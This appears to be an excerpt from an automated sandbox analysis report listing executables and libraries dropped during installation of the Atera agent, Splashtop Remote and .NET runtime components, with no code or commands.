                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAgent.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3352.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAudioChat.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC672.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\dbgshim.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcurl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\sthid.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\setupdrv.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.HttpUtility.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x86\SRWacomUtil32.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x86\SRUsb.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\fips.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxyumd.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\CredProvider\x86\SRCredentialProvider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Cng.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\WdfCoInstaller01009.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.Lightweight.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x64\SRWacomCtrl64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC672.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.HttpListener.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\PkgHelper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stmirror.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\WBAppVidRec.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC961.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\EvtLogProvider\stevt_srs_x86.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.DataSetExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSelfSignCertUtil.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Dataflow.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.Windows.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\stprintmon.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\ISRT.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdscale.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
